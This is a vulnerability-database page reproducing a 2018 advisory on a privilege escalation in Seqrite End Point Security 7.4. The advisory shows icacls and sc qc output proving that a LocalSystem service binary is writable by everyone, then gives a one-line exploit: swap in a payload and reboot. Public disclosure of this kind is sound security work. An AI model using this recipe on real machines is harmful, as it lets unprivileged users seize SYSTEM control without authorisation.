Vulners
Lucene search
Seqrite End Point Security 7.4 Privilege Escalation
`# Exploit Title : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation
# Date : 09/13/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.seqrite.com/
# Tested on : Windows 7 Enterprise SP1 (x64)
Description:
============
Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite" with very weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's subfolders. In addition, the program installs handful of services with binaries within the program folder that run as "LocalSystem". Given the "Self Protection" feature (on by default) is disabled which can be done in number of ways (for instance, if the policy does not enforce EPS client password to change the settings any user can disable that feature), meaning a non-privileged user would be able to elevate privileges to "NT AUTHORITY\SYSTEM".
Proof:
======
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\>
Exploit:
========
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.
# Disclosure Timeline:
# ====================
# 09-14-18: Contacted vendor, no response
# 09-21-18: Contacted vendor, no response
# 09-28-18: Vulnerability published
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Sep 2018 00:00Current
0.6Low risk
Vulners AI Score0.6